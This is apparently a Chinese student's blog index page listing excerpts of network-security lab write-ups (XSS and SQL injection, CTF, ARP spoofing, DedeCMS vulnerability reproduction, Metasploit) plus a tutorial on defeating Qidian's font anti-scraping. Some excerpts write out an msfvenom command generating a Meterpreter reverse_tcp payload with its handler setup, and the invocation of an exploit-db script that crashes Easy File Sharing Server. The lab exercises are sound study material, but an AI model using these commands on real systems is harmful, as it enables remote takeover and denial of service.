自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 关于使用Django框架的django-sslserver库进行https连接容易忽视的问题。

仍然会显示,没有该模块。如果使用库默认的证书,记得将 证书导入到浏览器中,就能正常使用https连接了。

2023-11-29 12:21:19 341 1

原创 保姆级教学,起点中文网字体反爬。

我们发现86.81被乱码取代了。虽然不知道为什么会显示乱码,但是说明这个内容是有价值的,我们尝试破解,并将86.81等等数字正常显示在控制台上。打开网页的源代码,找到86.81的源代码,我们发现“万字”前面有5串的数字,而86.81刚好时5个字符,我们猜测86.81被这5串数字取代了,说明源码可能是这些数字。那么思路就清晰了,我们只需要将这些源码破解了,并将破解的源码替换未破解的源码,那么就可能实现目的。我们刷新一下网页。突然发现那5串数字改变了,说明字体会刷..

2022-04-09 12:33:43 1562 2

原创 实验三 XSS和SQL注入

实验三 XSS和SQL注入实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA实验步骤:XSS部分:利用Be

2021-12-13 15:39:51 263

原创 实验四 CTF实践

实验四 CTF实践实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/实验工具:不限实验步骤和内容:目的:获取靶机Web Developer 文件/ro

2021-12-13 15:33:08 367

原创 实验二 网络嗅探与身份认证

实验目的:1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据。3、能利用BrupSuite实现网站登录暴力破解获得登录密码。4、能实现ZIP密码破解,理解安全密码的概念和设置。系统环境:Kali Linux 2、W

2021-12-12 12:10:35 294

原创 复现B-漏洞复现

一、漏洞概述1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 D.

2021-11-28 21:45:02 4362

原创 网络渗透实验1.0——网络扫描与网络侦察

1.实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。2.实验内容:1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。2、手机位置定位3、编码解码4、地址信息5、NMAP使用(两位同学配合完成6、6.1 利用ZoomEye搜索一个西门子公司工控设备,并描述其可能存在的安全问题。6.2 利...

2021-11-22 11:46:47 3353

原创 Metasploit渗透测试(获取靶机控制权)

一,打开kali生成一个被控端:输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe这是你会发现你的kali会多出一个文件:二,然后在kali输入msfconsole:然后输入set payload windows/meterpreter/reverse_tcp,回车zai再输入set lhost 靶机ip...

2021-11-07 19:12:17 545

原创 漏洞渗透测试easy file sharing server

一,在靶机上安装easy file sharing server,安装启动好后,配置必要信息。其中,upl填靶机的ip地址。二,配置好相关信息后,进入kali,输入下面截图命令,获取easy file sharing server该漏洞。然后再输入命令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机IP。其中用39009漏洞进行实验。回车后会发现靶机崩溃并允许计算机。结束。...

2021-11-07 18:31:29 3445

原创 Metasploitable靶机渗透

1.导入命令ifconfig得到自己的本机ip(即攻击机)2.在kali打开nmap,输入自己的本机ip范围,得到在同一局域网的内存活的主机。3.找到21端口,图片显示ftp。4.接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip5.然后使用浏览器来浏览http服务的信息,在网址栏输入目标靶机ip6.得到网页,网页给出信息,登录靶机的账号密码7.然后输入telnet ip 登录靶机8.之后再调出控制栏输入msfconsole,连接靶机.

2021-11-01 21:08:17 2999

原创 关于渗透测试老师给我张图要我找该图地址这件事

如图所示,就是这个奇奇怪怪的图片。或许很多人跟我一样,在拿到这个图片是一脸懵逼的,这怎么找(神经病,hh)。作为小白我一开始想到的是百度识图。嗯,的确,识图识出来了。但是根本没有想要的信息,而老师要求根据这张图找出这家麦当劳具体的位置。 很好,百度没用嘛。此时只能观察图片信息:法一:观察到薯条下面有条数据单,那么从这里入手。直接开第一行,很明显地看到一个单词restaurant,那么前面很有可能是这家餐馆的名称,即----arbang Alafrestaurant...

2021-10-25 22:04:51 129

转载 等保1.0与等保2.0的变化

名称变化《中华人民共和国网络安全法》明确规定“国家实行网络安全等级保护制度“,相关法律条文和标准也需保持一致性,“等保2.0”将原标准的“信息系统安全等级保护”改为“网络安全等级保护”,例如《信息系统安全等级保护基本要求》改为《网络安全等级保护基本要求》。法律依据《网络安全法》颁布实施,等级保护制度确定为网络安全领域的基本制度,法定制度。核心法律依据和主要制定依据的相关效力位阶:保护对象变化等保1.0定义等级保护对象为:信息安全等级保护工作直接作用的具体信息和信息系统。随着云计.

2021-10-25 21:46:14 395

原创 Wireshark抓取ping包

TCP:传输控制协议(TCP,Transmission Control Protocol)是一种面向连接的、可靠的、基于字节流的传输层通信协议,由IETF的RFC 793[1]定义。TCP旨在适应支持多网络应用的分层协议层次结构。 连接到不同但互连的计算机通信网络的主计算机中的成对进程之间依靠TCP提供可靠的通信服务。TCP假设它可以从较低级别的协议获得简单的,可能不可靠的数据报服务。 原则上,TCP应该能够在从硬线连接到分组交换或电路交换网络的各种通信系统之上操作.首先抓取数据包首...

2021-10-13 19:54:44 6309

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除